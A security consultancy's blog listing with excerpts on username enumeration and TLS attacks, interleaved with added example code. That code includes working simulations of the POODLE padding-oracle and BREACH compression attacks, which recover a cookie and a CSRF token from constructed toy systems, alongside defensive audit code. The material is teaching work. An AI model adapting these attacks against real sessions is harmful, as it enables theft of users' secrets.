Contact us: info@akimbocore.com

Preventing Username Enumeration

Published: 01 December 2022    Last Updated: 01 December 2022

First of all, what is username enumeration? It is when a web application has a feature that allows a user to supply a username and the application discloses (not necessarily intentionally) whether that username is valid. This is closely related to Username Disclosure, except that in the latter the application itself includes valid usernames in its responses in some way, so an attacker can learn that a username is valid without having to guess it first. Both of these are an issue and both should be addressed.
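
The two ways a login form gives the game away, and the fix, as an added example (this is not code from the article or from Akimbo Core): a handler that reveals whether a username exists through a different message and through doing less work for unknown users, beside a handler that returns one message and pays the same password-hashing cost either way. The user store, salt, password and function names are constructed for the example.

```python
import hashlib
import hmac
import os


def _hash_password(password: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)


# Constructed user store for the example: username -> (salt, PBKDF2-SHA256 hash).
_SALT = b"0123456789abcdef"
USERS = {"alice": (_SALT, _hash_password(b"correct horse battery staple", _SALT))}

# Stand-in credentials for unknown users, so the hardened handler does identical work for them.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password(os.urandom(16), _DUMMY_SALT)


def login_vulnerable(username: str, password: str):
    """Leaks validity twice: the message differs, and an unknown user skips the slow hash (a timing tell)."""
    record = USERS.get(username)
    if record is None:
        return 404, "Unknown username"
    salt, stored = record
    if not hmac.compare_digest(_hash_password(password.encode(), salt), stored):
        return 401, "Incorrect password"
    return 200, "Welcome"


def login_hardened(username: str, password: str):
    """One status, one message, and the same PBKDF2 cost whether or not the username exists."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    matched = hmac.compare_digest(_hash_password(password.encode(), salt), stored)
    if username not in USERS or not matched:
        return 401, "Invalid username or password"
    return 200, "Welcome"


def leaks_username_validity(handler, valid_user: str, unknown_user: str) -> bool:
    """The tester's check: does a wrong password for a real account look any different from one for a
    fake account? A real test also compares response timing; this compares status and body only."""
    return handler(valid_user, "not-the-password") != handler(unknown_user, "not-the-password")
```

The same rule applies to registration and password-reset forms: respond with the same page, and in the same time, whether or not the account exists ("if that address is registered, we have sent an email"), and rate-limit the endpoint, because an attacker who cannot tell responses apart can still try usernames in bulk.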


Multifactor Authentication (MFA)

Published: 09 November 2022    Last Updated: 11 November 2022

An authentication factor is something that is supplied to verify an identity – the most common example of an authentication factor is a password, a secret word used to authenticate yourself for access to an account. Multi-factor authentication is the requirement to supply several factors during authentication. This is often called “Two Factor Authentication” (2FA) because, most commonly, two factors are required, but in some instances more may be required, so MFA is the more general term.


Small Business E-commerce: How do I prevent my site getting hacked?

Published: 02 November 2022    Last Updated: 04 November 2022

With modern platforms such as WordPress, WooCommerce, Magento, and Shopify, it’s now easier than ever to create an online store. However, many online retailers are not cybersecurity experts and might not be sure where to get started with securing their site.


Penetration Testing: Mix it up or stick with it?

Published: 02 November 2022    Last Updated: 03 November 2022

After publishing yesterday’s article about how frequently you should get a penetration test, I inadvertently started a discussion on Twitter about another aspect of penetration testing delivery: should you change providers, or should you stick with who you know?


Selecting a PenTest Provider – Making a Good Decision

Published: 28 October 2022    Last Updated: 03 November 2022

Choosing a PenTesting provider can be difficult: how do you know whether they’re good at what they do and whether they’ll make working together easy? Perhaps you have a provider already, but they’ve not lived up to your expectations.

Since choosing a testing provider is a critical part of your cybersecurity strategy, we’ve added a few things to consider here. We’re also available for advice and help if you’ve got questions about testing in general or how to get started with your strategy.


Penetration Testing: how often should you test?

Published: 28 October 2022    Last Updated: 03 November 2022

The truth is, it’s very unlikely you’ll get a firm answer from any organisation as to how frequently you should test. Even organisations like the NCSC, who offer guidance to UK businesses on how to stay secure, don’t give a direct answer to the question. They may, however, comment on other businesses’ behaviour, for example saying “it’s not uncommon for a year or more to elapse between penetration tests” before noting that this is likely insufficient.


Penetration Testing: how do you get the most from your budget?

Published: 27 October 2022    Last Updated: 03 November 2022

Tips and tricks to make the most of your penetration testing budget. We suggest practical ways to obtain the best value for your spend.


How Can I Turn PenTesting from a Cost into a Competitive Advantage?

Published: 27 October 2022    Last Updated: 03 November 2022

Turn Penetration Testing from a cost to a competitive advantage using customer retention, legal compliance and modern business practices in your favour.


Sweet32

Published: 27 October 2022    Last Updated: 03 November 2022

Sweet32 describes a birthday attack on 64-bit block ciphers. It has been demonstrated against both 3DES (in HTTPS) and Blowfish (in OpenVPN). It allows an attacker who can perform an interception attack, and who can capture a large volume of traffic encrypted under the same key, to decrypt small amounts of ciphertext, such as session tokens and other sensitive cookie values.


Lucky 13

Published: 25 October 2022    Last Updated: 03 November 2022

Lucky 13 is a padding oracle vulnerability against CBC-mode ciphers in TLS that uses a timing side-channel. It stems from the MAC-then-encrypt construction in the SSL/TLS specification itself rather than from any one implementation; however, implementations can harden against it, and prevent exploitation, by removing the timing side-channel.


CBC-mode Ciphers

Published: 25 October 2022    Last Updated: 03 November 2022

The use of Cipher Block Chaining (CBC) mode ciphers is “discouraged”. This term is used because these cipher suites have not been formally deprecated but have effectively been superseded: later versions of Transport Layer Security support more secure cipher modes such as Galois/Counter Mode (GCM), and TLS 1.3 removes CBC-mode suites altogether. Additionally, CBC-mode ciphers have had a series of vulnerabilities such as Lucky13, Zombie POODLE, GOLDENDOODLE, 0-Length OpenSSL, and Sleeping POODLE.


Padding Oracle On Downgraded Legacy Encryption (POODLE)

Published: 25 October 2022    Last Updated: 03 November 2022

Padding Oracle On Downgraded Legacy Encryption (POODLE) is an attack against SSLv3.0. It exploits two aspects of SSLv3.0. The first is that an attacker performing an interception attack can modify network traffic between a client and server to downgrade the connection to SSLv3.0. The second is a padding oracle in SSLv3.0’s use of block ciphers in cipher-block chaining mode, which allows an attacker to decrypt small amounts of ciphertext within messages, such as session tokens and confidential cookie values.
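
How the padding oracle behind POODLE, and the wider CBC-mode and Lucky 13 findings above, turns a bare accept/reject into plaintext, as an added example rather than code from the article or from Akimbo Core. It rebuilds the SSLv3 record layer (MAC, then padding whose bytes are never checked, then CBC encryption) over a toy Feistel block cipher built from SHA-256 so that it runs with the standard library, and then runs the POODLE attack itself: the attacker shapes each request so that the wanted cookie byte is the last byte of a block and the padding is a full block, copies the target ciphertext block over the padding block, and learns one byte of cookie each time the server accepts the record (one time in 256). Lucky 13 recovers the same bit from timing rather than from an explicit reject. The keys, the cookie, the request shaping and the toy cipher are all constructed.

```python
import hashlib
import hmac
import os

BLOCK = 16        # block size in bytes; SSLv3 requires the pad-length byte to be < BLOCK
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy 128-bit block cipher: an 8-round Feistel network with SHA-256 as the round function. Constructed
# for this example only; it stands in for AES or 3DES, which the attack never needs to open.
def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(prev, data[i:i + BLOCK]))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out


# SSLv3 record protection: MAC, then pad, then encrypt. Only the final byte (the pad length) is checked;
# the padding bytes themselves are not, and that unchecked padding is what POODLE exploits.
def ssl3_protect(enc_key: bytes, mac_key: bytes, iv: bytes, data: bytes) -> bytes:
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()[:16]
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    return cbc_encrypt(enc_key, iv, body)


def ssl3_unprotect(enc_key: bytes, mac_key: bytes, iv: bytes, record: bytes):
    """Return the record data, or None when the record is rejected. That accept/reject bit is the oracle."""
    body = cbc_decrypt(enc_key, iv, record)
    pad_len = body[-1]
    if pad_len >= BLOCK:
        return None
    body = body[:len(body) - pad_len - 1]
    if len(body) < 16:
        return None
    data, tag = body[:-16], body[-16:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, data, hashlib.sha256).digest()[:16]):
        return None
    return data


ENC_KEY, MAC_KEY = os.urandom(16), os.urandom(16)   # the victim session's keys; the attacker never sees them
SECRET_COOKIE = b"s3cr3t"                            # constructed secret the attacker wants to read


def victim_request(prefix_len: int, suffix_len: int):
    """The browser, steered by attacker-controlled JavaScript, sends the cookie at a chosen offset."""
    data = b"A" * prefix_len + SECRET_COOKIE + b"B" * suffix_len
    iv = os.urandom(BLOCK)                            # a fresh IV per record keeps the toy simple
    return iv, ssl3_protect(ENC_KEY, MAC_KEY, iv, data)


def server_accepts(iv: bytes, record: bytes) -> bool:
    return ssl3_unprotect(ENC_KEY, MAC_KEY, iv, record) is not None


def poodle_recover(secret_len: int) -> bytes:
    """Recover the cookie byte by byte using only the accept/reject oracle (about 256 requests per byte)."""
    recovered = bytearray()
    for i in range(secret_len):
        prefix_len = (BLOCK - 1 - i) % BLOCK              # secret byte i becomes the last byte of a block ...
        suffix_len = -(prefix_len + secret_len) % BLOCK   # ... and data + MAC fill whole blocks, so the padding is a full block
        t = (prefix_len + i) // BLOCK                     # plaintext block P_t holds the byte; its ciphertext is C_{t+1}
        for _ in range(20_000):
            iv, record = victim_request(prefix_len, suffix_len)
            c = [iv] + [record[j:j + BLOCK] for j in range(0, len(record), BLOCK)]   # c[k] = C_k, C_0 = IV
            tampered = record[:-BLOCK] + c[t + 1]         # overwrite the padding block with the target block
            if server_accepts(iv, tampered):
                # accepted  =>  D(C_{t+1})[-1] ^ C_{n-1}[-1] == BLOCK-1, and P_t = D(C_{t+1}) ^ C_t
                recovered.append((BLOCK - 1) ^ c[-2][-1] ^ c[t][-1])
                break
        else:
            raise RuntimeError("oracle never accepted")
    return bytes(recovered)
```

The remedy is not a cleverer padding check but leaving the construction behind: disable SSLv3, support TLS_FALLBACK_SCSV so an interceptor cannot force the downgrade, and prefer AEAD suites over CBC.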


Factoring RSA Export Keys (FREAK)

Published: 21 October 2022    Last Updated: 03 November 2022

Factoring RSA Export Keys (FREAK) is an attack against “export cipher suites”, cipher suites that have intentionally limited security due to earlier United States regulation, which placed restrictions on the strength of encryption algorithms in software intended for export. The attack was demonstrated in 2015: an attacker who can perform an interception attack against HTTPS traffic forces the connection onto a 512-bit export-grade RSA key, which is small enough to factor, and can then decrypt message contents.


RC4 NOMORE

Published: 21 October 2022    Last Updated: 03 November 2022

An attack against RC4, now usually referred to as RC4 NOMORE, was demonstrated in 2015. It affects the use of RC4 in several protocols, including Transport Layer Security (TLS), used by web browsers and web applications, and WPA-TKIP, used by wireless networks. Applied to TLS, the weakness allows an attacker to decrypt a small amount of content that is repeated across many connections, such as a session token or other sensitive cookie value.
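
Turning the four findings above (Sweet32, CBC mode, FREAK and RC4 NOMORE) into a check over a scanner's cipher-suite list, as an added example that is not Akimbo Core's code: each IANA suite name is matched against the property that makes it weak, and the Sweet32 birthday bound is computed so that a report can say how much traffic a collision actually needs. The sample suite list is constructed, and the finding names and helper names are this example's own.

```python
import math
import re

# Constructed sample: the cipher suites a scanner reported a server as accepting (IANA names).
SAMPLE_SUITES = [
    "TLS_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_RSA_WITH_RC4_128_SHA",
    "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
    "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA",
]

# (finding, predicate on the IANA suite name, reason). Blowfish never appears in a TLS suite name;
# OpenVPN's BF-CBC would need its own check against the VPN configuration.
RULES = [
    ("FREAK / export-grade", lambda s: "_EXPORT" in s,
     "export suites use 40/56-bit symmetric keys or 512-bit RSA, both breakable"),
    ("RC4 NOMORE", lambda s: "_RC4_" in s,
     "RC4 keystream biases recover plaintext that repeats across connections, such as cookies"),
    ("Sweet32 (64-bit block)", lambda s: re.search(r"_(3DES|DES40|DES|IDEA)_", s) is not None,
     "64-bit blocks start colliding after about 2^32 blocks (~32 GB) under one key"),
    ("CBC mode (discouraged)", lambda s: "_CBC_" in s,
     "padding-oracle class (Lucky 13, POODLE variants); prefer AEAD suites such as GCM"),
]


def classify(suite: str) -> list:
    """Every finding a single suite triggers, in RULES order (an empty list means nothing to report)."""
    return [name for name, pred, _ in RULES if pred(suite)]


def audit(suites) -> dict:
    """Group the suites under each finding they trigger, ready for a report table."""
    findings = {}
    for suite in suites:
        for name in classify(suite):
            findings.setdefault(name, []).append(suite)
    return findings


def collision_probability(block_bits: int, n_blocks: int) -> float:
    """Birthday bound behind Sweet32: P(some ciphertext block repeats) ~ 1 - exp(-n^2 / 2^(b+1))."""
    return 1.0 - math.exp(-(n_blocks ** 2) / 2.0 ** (block_bits + 1))


def bytes_until_collision(block_bits: int, probability: float = 0.5) -> float:
    """Traffic volume under one key at which a repeated block is expected with the given probability."""
    n_blocks = math.sqrt((2.0 ** (block_bits + 1)) * -math.log(1.0 - probability))
    return n_blocks * (block_bits // 8)
```

For a 64-bit block the even-odds point is roughly 40 GB under a single key, which is why Sweet32 matters most for long-lived connections that carry a repeated secret, and why the same calculation for a 128-bit block gives a figure no real connection will reach.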


Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext (BREACH)

Published: 21 October 2022    Last Updated: 03 November 2022

Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext (BREACH) is a vulnerability similar in nature to CRIME, but where CRIME affected TLS/SPDY compression, BREACH affects HTTP compression. Where an application supports HTTP compression, reflects user input within response bodies, and includes confidential information in that same body – such as a CSRF token – it may be affected by BREACH. This attack was demonstrated as practical in 2013.
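
The length side-channel itself, as an added example that is not code from the article or from Akimbo Core: a constructed page reflects a search query and carries a CSRF token, and the attacker recovers the token one character at a time by reflecting the known prefix plus a guess and watching which guess makes the response compress smaller. To keep the signal exact, compression is modelled as DEFLATE's LZ77 stage only (the number of literal and back-reference tokens); real zlib output adds Huffman coding on top, which is the noise the original BREACH work handles with its "two tries" technique. The token, the page template and the function names are constructed.

```python
SECRET_TOKEN = "a3f9c1"                     # constructed CSRF token the attacker wants
ALPHABET = "0123456789abcdef"
KNOWN_PREFIX = 'name="token" value="'       # the bytes that precede the token in the page, known from the HTML


def render_page(reflected: str, token: str = SECRET_TOKEN) -> bytes:
    """Constructed vulnerable page: reflects the search query and carries a CSRF token in the same body."""
    return (
        "<html><body><p>No results for: " + reflected + "</p>"
        '<form method="post"><input type="hidden" name="token" value="' + token + '"></form>'
        "</body></html>"
    ).encode()


def lz77_size(data: bytes, min_match: int = 3, max_match: int = 258, window: int = 32768) -> int:
    """Number of tokens in a greedy LZ77 parse (literals and back-references). This is the DEFLATE stage
    that BREACH relies on; real zlib adds Huffman coding, so real measurements are noisier than this."""
    i, tokens = 0, 0
    while i < len(data):
        best = 0
        for j in range(max(0, i - window), i):
            length = 0
            while i + length < len(data) and length < max_match and data[j + length] == data[i + length]:
                length += 1
            best = max(best, length)
        i += best if best >= min_match else 1
        tokens += 1
    return tokens


def response_size(query: str) -> int:
    """What the attacker observes on the wire: the compressed length of the response to their query."""
    return lz77_size(render_page(query))


def breach_recover(size_oracle, known_prefix: str, length: int, alphabet: str = ALPHABET) -> str:
    """Guess one character at a time; the right guess extends an existing match and saves a token."""
    recovered = ""
    for _ in range(length):
        sizes = {ch: size_oracle(known_prefix + recovered + ch) for ch in alphabet}
        recovered += min(sizes, key=sizes.get)
    return recovered
```

The defences follow from the three preconditions: disable HTTP compression on responses that carry secrets, keep reflected input out of those responses, or mask the secret per request (as frameworks do for CSRF tokens) so that no two responses contain the same bytes to match against.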

